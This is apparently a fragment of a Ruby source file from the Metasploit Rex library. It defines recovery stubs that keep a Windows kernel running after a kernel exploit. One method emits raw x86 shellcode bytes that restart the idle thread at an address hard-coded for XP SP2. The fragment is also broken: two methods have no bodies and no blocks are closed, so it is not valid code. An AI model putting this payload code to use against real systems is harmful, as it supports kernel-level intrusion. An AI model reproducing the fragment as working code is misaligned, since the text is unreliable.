module Rex
module Payloads
module Win32
module Kernel
# Recovery stubs are responsible for ensuring that the kernel does not crash.
# They must 'recover' after the exploit has succeeded, either by consuming
# the thread or continuing it on with its normal execution. Recovery stubs
# will often be exploit dependent.
module Recovery
# The default recovery method is to spin the thread
def self.default(opts = {})
# Infinite 'hlt' loop.
def self.spin(opts = {})
# Restarts the idle thread by jumping back to the entry point of
# KiIdleLoop. This requires a hard-coded address of KiIdleLoop.
# You can pass the 'KiIdleLoopAddress' in the options hash.
def self.idlethread_restart(opts = {})
# Default to fully patched XPSP2
opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil?
"\x31\xC0" + # xor eax,eax
"\x64\xC6\x40\x24\x02" + # mov byte [fs:eax+0x24],0x2
"\x8B\x1D\x1C\xF0\xDF\xFF" + # mov ebx,[0xffdff01c]
"\xB8" + [opts['KiIdleLoopAddress']].pack('V') + # mov eax, 0x804dbb27
"\x6A\x00" + # push byte +0x0
"\xFF\xE0" # jmp eax